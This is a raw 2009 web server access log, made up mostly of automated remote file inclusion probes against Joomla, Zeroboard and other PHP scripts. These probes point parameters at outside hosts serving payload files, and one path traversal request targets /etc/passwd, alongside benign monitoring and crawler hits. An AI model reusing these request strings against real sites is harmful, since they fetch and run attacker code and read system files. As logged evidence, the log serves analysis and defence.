210.118.194.200 - - [17/May/2009:01:35:31 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
210.118.194.200 - - [17/May/2009:01:35:31 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
210.118.194.200 - - [17/May/2009:01:35:31 -0400] "GET /logs/access_log.Q108100700//components/com_hashcash/server.php?mosConfig_absolute_path=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
222.236.44.32 - - [17/May/2009:01:35:37 -0400] "GET /logs/error_log.Q108082500%20//upgrade_album.php?GALLERY_BASEDIR=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
89.149.235.45 - - [17/May/2009:01:36:13 -0400] "GET /logs//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.149.235.45 - - [17/May/2009:01:36:13 -0400] "GET //index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.149.235.45 - - [17/May/2009:01:36:13 -0400] "GET /logs/access_log.Q108090600%20%20//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.149.235.45 - - [17/May/2009:01:36:17 -0400] "GET /logs/access_log.Q109021400%20%20//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.149.235.45 - - [17/May/2009:01:36:21 -0400] "GET //index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.149.235.45 - - [17/May/2009:01:36:21 -0400] "GET /logs//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.149.235.45 - - [17/May/2009:01:36:21 -0400] "GET /logs/access_log.Q108071900//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
81.175.71.121 - - [17/May/2009:01:36:27 -0400] "GET /logs/access_log.Q108071900//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
81.175.71.121 - - [17/May/2009:01:36:27 -0400] "GET //index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
81.175.71.121 - - [17/May/2009:01:36:28 -0400] "GET /logs//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.149.235.45 - - [17/May/2009:01:36:36 -0400] "GET /logs/access_log.Q108072300//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.118.194.200 - - [17/May/2009:01:36:38 -0400] "GET /logs/access_log.Q108120600//components/com_hashcash/server.php?mosConfig_absolute_path=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:01:36:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
81.175.71.121 - - [17/May/2009:01:36:48 -0400] "GET /logs/access_log.Q108072300//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
81.175.71.121 - - [17/May/2009:01:37:03 -0400] "GET /logs//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
81.175.71.121 - - [17/May/2009:01:37:03 -0400] "GET /logs/access_log.Q109021400//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
81.175.71.121 - - [17/May/2009:01:37:03 -0400] "GET /logs/access_log.Q108090600//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
81.175.71.121 - - [17/May/2009:01:37:03 -0400] "GET //index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.30.79.49 - - [17/May/2009:01:37:19 -0400] "GET /logs/access_log.Q109050900 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.149.235.45 - - [17/May/2009:01:38:16 -0400] "GET /logs/access_log.Q108090600//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.149.235.45 - - [17/May/2009:01:38:16 -0400] "GET /logs/access_log.Q109021400//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
110.45.144.106 - - [17/May/2009:01:38:23 -0400] "GET /logs/access_log.Q109012800/includes/ktedit/toolbar.php?dirDepth=http://stonemac.com/bbs/g/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
72.30.79.49 - - [17/May/2009:01:38:23 -0400] "GET /logs/error_log.Q109051200 HTTP/1.0" 200 4570374 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.79.49 - - [17/May/2009:01:38:26 -0400] "GET /logs/error_log.Q109051200 HTTP/1.0" 200 4570374 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.79.49 - - [17/May/2009:01:39:32 -0400] "GET /logs/access_log.Q107102100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
116.121.201.70 - - [17/May/2009:01:40:19 -0400] "GET /logs/access_log.Q108040300//?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 404 226 "-" "libwww-perl/5.65"
116.121.201.70 - - [17/May/2009:01:40:20 -0400] "GET //?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 452 "-" "libwww-perl/5.65"
116.121.201.70 - - [17/May/2009:01:40:21 -0400] "GET /logs//?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 1691 "-" "libwww-perl/5.65"
121.254.229.131 - - [17/May/2009:01:41:06 -0400] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
121.254.229.131 - - [17/May/2009:01:41:06 -0400] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 274 "-" "libwww-perl/5.79"
121.254.229.131 - - [17/May/2009:01:41:06 -0400] "GET /logs/access_log.Q108112400//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
190.228.29.17 - - [17/May/2009:01:41:19 -0400] "GET /logs/?sourcedir=http://www.webfo.biz/unix/test.txt?? HTTP/1.1" 200 1686 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
190.228.29.17 - - [17/May/2009:01:41:19 -0400] "GET /?sourcedir=http://www.webfo.biz/unix/test.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
209.59.12.99 - - [17/May/2009:01:41:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.79.49 - - [17/May/2009:01:41:57 -0400] "GET /logs/access_log.Q108012800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
116.121.201.70 - - [17/May/2009:01:42:10 -0400] "GET /logs/access_log.Q108112400//?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 404 226 "-" "libwww-perl/5.65"
116.121.201.70 - - [17/May/2009:01:42:11 -0400] "GET //?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 452 "-" "libwww-perl/5.65"
116.121.201.70 - - [17/May/2009:01:42:12 -0400] "GET /logs//?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 200 1691 "-" "libwww-perl/5.65"
121.254.229.131 - - [17/May/2009:01:42:12 -0400] "GET /logs/access_log.Q108092000//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 301 "-" "libwww-perl/5.79"
89.149.235.45 - - [17/May/2009:01:42:27 -0400] "GET /logs/access_log.Q108071900%20%20//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.149.235.45 - - [17/May/2009:01:42:31 -0400] "GET /logs/access_log.Q108072300%20%20//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.118.194.200 - - [17/May/2009:01:42:45 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
210.118.194.200 - - [17/May/2009:01:42:45 -0400] "GET /logs/access_log.Q108100700%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
210.118.194.200 - - [17/May/2009:01:42:45 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
210.118.194.200 - - [17/May/2009:01:43:05 -0400] "GET /logs/access_log.Q108061400%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
222.239.76.25 - - [17/May/2009:01:43:21 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
222.239.76.25 - - [17/May/2009:01:43:21 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.239.76.25 - - [17/May/2009:01:43:21 -0400] "GET /logs/access_log.Q108100700%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:01:43:32 -0400] "GET //?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:01:43:32 -0400] "GET /logs//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 1691 "-" "Mozilla/5.0"
222.239.76.25 - - [17/May/2009:01:43:39 -0400] "GET /logs/access_log.Q108061400%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
65.98.59.178 - - [17/May/2009:01:44:00 -0400] "GET //include/admin.lib.inc.php?site_path=http://h1.ripway.com/lupa121/makan.txt??? HTTP/1.1" 404 224 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
65.98.59.178 - - [17/May/2009:01:44:02 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://h1.ripway.com/lupa121/makan.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
209.172.33.230 - - [17/May/2009:01:44:07 -0400] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 274 "-" "libwww-perl/5.812"
209.172.33.230 - - [17/May/2009:01:44:07 -0400] "GET /logs/access_log.Q108112400//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 301 "-" "libwww-perl/5.812"
209.172.33.230 - - [17/May/2009:01:44:12 -0400] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 279 "-" "libwww-perl/5.812"
209.172.33.230 - - [17/May/2009:01:45:04 -0400] "GET /logs/access_log.Q108092000//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 301 "-" "libwww-perl/5.812"
123.143.98.5 - - [17/May/2009:01:45:07 -0400] "GET /logs//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 1691 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:01:45:07 -0400] "GET //?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
91.184.52.3 - - [17/May/2009:01:45:08 -0400] "GET /logs/access_log.Q108112400/skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
91.184.52.3 - - [17/May/2009:01:45:12 -0400] "GET /logs/error_log.Q108100300/skin/zero_vote/error.php?dir=http://kcaer.re.kr/zboard/icon/id.txt?%0D? HTTP/1.1" 404 248 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
221.139.104.104 - - [17/May/2009:01:46:36 -0400] "GET /logs/error_log.Q109030900///?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
221.139.104.104 - - [17/May/2009:01:46:36 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 200 1692 "-" "libwww-perl/5.805"
209.59.12.99 - - [17/May/2009:01:46:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
116.121.201.70 - - [17/May/2009:01:47:04 -0400] "GET /logs/error_log.Q108040300//?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
72.30.79.49 - - [17/May/2009:01:47:59 -0400] "GET /logs/error_log.Q107110500 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.149.235.45 - - [17/May/2009:01:48:10 -0400] "GET /logs/access_log.Q108082200//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
81.175.71.121 - - [17/May/2009:01:48:14 -0400] "GET /logs/access_log.Q108071900%20%20//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.149.235.45 - - [17/May/2009:01:49:18 -0400] "GET //e404.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
89.149.235.45 - - [17/May/2009:01:49:18 -0400] "GET /logs//e404.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
89.149.235.45 - - [17/May/2009:01:49:18 -0400] "GET /logs/access_log.Q108080900//e404.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
81.175.71.121 - - [17/May/2009:01:49:38 -0400] "GET /logs/access_log.Q108090600%20%20//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
81.175.71.121 - - [17/May/2009:01:49:43 -0400] "GET //e404.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
81.175.71.121 - - [17/May/2009:01:49:43 -0400] "GET /logs//e404.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
81.175.71.121 - - [17/May/2009:01:49:43 -0400] "GET /logs/access_log.Q108080900//e404.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.30.79.49 - - [17/May/2009:01:49:44 -0400] "GET /logs/error_log.Q107121900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
81.175.71.121 - - [17/May/2009:01:51:15 -0400] "GET /logs/access_log.Q108090200//e404.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.149.235.45 - - [17/May/2009:01:51:25 -0400] "GET /logs/access_log.Q108080900%20%20//e404.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:01:51:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.232.102.70 - - [17/May/2009:01:52:27 -0400] "GET ///skin/zero_vote/ask_password.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.813"
66.232.102.70 - - [17/May/2009:01:52:27 -0400] "GET /logs/access_log.Q108100900///skin/zero_vote/ask_password.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.813"
66.232.102.70 - - [17/May/2009:01:52:27 -0400] "GET /logs///skin/zero_vote/ask_password.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.813"
72.30.79.49 - - [17/May/2009:01:52:55 -0400] "GET /images/_notes/store_anim_r2_c1_f4.gif.mno HTTP/1.0" 200 250 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
81.175.71.121 - - [17/May/2009:01:53:09 -0400] "GET /logs/access_log.Q108082200//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
81.175.71.121 - - [17/May/2009:01:53:56 -0400] "GET /logs/access_log.Q108080900%20%20//e404.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
116.121.201.70 - - [17/May/2009:01:54:01 -0400] "GET /logs/access_log.Q109050700//?_zb_path=http://ssdnb.net/bbs/data/vo?? HTTP/1.1" 404 226 "-" "libwww-perl/5.65"
72.30.79.49 - - [17/May/2009:01:54:09 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.79.49 - - [17/May/2009:01:54:09 -0400] "GET /logs/error_log.Q107081000 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
123.143.98.5 - - [17/May/2009:01:54:12 -0400] "GET /logs//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 1691 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:01:54:12 -0400] "GET /logs/access_log.Q108121400%20%20//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:01:54:12 -0400] "GET //?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
81.175.71.121 - - [17/May/2009:01:54:13 -0400] "GET /logs/access_log.Q108090200%20%20//e404.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:01:54:24 -0400] "GET /logs//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 1691 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:01:54:24 -0400] "GET //?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:01:54:24 -0400] "GET /logs/access_log.Q108121400%20%20//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:01:54:33 -0400] "GET /logs/access_log.Q108112300%20%20//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:01:54:40 -0400] "GET /logs/access_log.Q108112300%20%20//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
89.248.102.157 - - [17/May/2009:01:54:41 -0400] "GET /logs/components/com_calendar.php?absolute_path=http://www.search9.net/config/proxy/ec.txt?? HTTP/1.1" 404 230 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
89.248.102.157 - - [17/May/2009:01:54:42 -0400] "GET /logs/components/com_calendar.php?absolute_path=http://arclips.com/flash/bo.do?? HTTP/1.1" 404 230 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
89.248.102.157 - - [17/May/2009:01:54:42 -0400] "GET /components/com_calendar.php?absolute_path=http://www.search9.net/config/proxy/ec.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
89.248.102.157 - - [17/May/2009:01:54:44 -0400] "GET /components/com_calendar.php?absolute_path=http://arclips.com/flash/bo.do?? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
89.149.235.45 - - [17/May/2009:01:56:23 -0400] "GET /logs/access_log.Q108090200//e404.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
67.19.228.18 - - [17/May/2009:01:56:40 -0400] "GET ///citywriter/head.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
67.19.228.18 - - [17/May/2009:01:56:40 -0400] "GET /logs///citywriter/head.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
67.19.228.18 - - [17/May/2009:01:56:41 -0400] "GET /logs/access_log.Q108122000///citywriter/head.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:01:56:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.19.228.18 - - [17/May/2009:01:56:48 -0400] "GET ///citywriter/head.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
67.19.228.18 - - [17/May/2009:01:56:48 -0400] "GET /logs/access_log.Q108122000///citywriter/head.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
67.19.228.18 - - [17/May/2009:01:56:48 -0400] "GET /logs///citywriter/head.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
67.19.228.18 - - [17/May/2009:01:56:50 -0400] "GET /logs/access_log.Q109032500///citywriter/head.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
67.19.228.18 - - [17/May/2009:01:56:54 -0400] "GET ///citywriter/head.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
67.19.228.18 - - [17/May/2009:01:56:55 -0400] "GET /logs///citywriter/head.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
67.19.228.18 - - [17/May/2009:01:56:55 -0400] "GET /logs/access_log.Q108122000///citywriter/head.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
67.19.228.18 - - [17/May/2009:01:57:07 -0400] "GET /logs/access_log.Q109032500///citywriter/head.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
67.19.228.18 - - [17/May/2009:01:57:13 -0400] "GET /logs/access_log.Q109032500///citywriter/head.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
72.30.79.49 - - [17/May/2009:01:57:41 -0400] "GET /logs/error_log.Q109051700 HTTP/1.0" 200 227023 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.79.49 - - [17/May/2009:01:57:41 -0400] "GET /logs/error_log.Q109051700 HTTP/1.0" 200 227023 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.19.228.18 - - [17/May/2009:01:58:14 -0400] "GET /logs/access_log.Q108122000%20%20///citywriter/head.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
67.19.228.18 - - [17/May/2009:01:58:19 -0400] "GET /logs/access_log.Q109032500%20%20///citywriter/head.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
67.19.228.18 - - [17/May/2009:01:58:36 -0400] "GET /logs/access_log.Q108122000%20%20///citywriter/head.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
89.149.235.45 - - [17/May/2009:01:58:43 -0400] "GET //index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.149.235.45 - - [17/May/2009:01:58:43 -0400] "GET /logs/access_log.Q108110500%20%20//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.149.235.45 - - [17/May/2009:01:58:43 -0400] "GET /logs//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.19.228.18 - - [17/May/2009:01:58:43 -0400] "GET /logs/access_log.Q109032500%20%20///citywriter/head.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
67.19.228.18 - - [17/May/2009:01:58:44 -0400] "GET /logs/access_log.Q108122000%20%20///citywriter/head.php?path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
89.149.235.45 - - [17/May/2009:01:58:44 -0400] "GET //index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.149.235.45 - - [17/May/2009:01:58:44 -0400] "GET /logs/access_log.Q108082200//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.149.235.45 - - [17/May/2009:01:58:44 -0400] "GET /logs//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
81.175.71.121 - - [17/May/2009:01:58:48 -0400] "GET /logs/access_log.Q108110500%20%20//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
81.175.71.121 - - [17/May/2009:01:58:48 -0400] "GET /logs//index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
81.175.71.121 - - [17/May/2009:01:58:48 -0400] "GET //index.php?INCLUDE_FOLDER=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
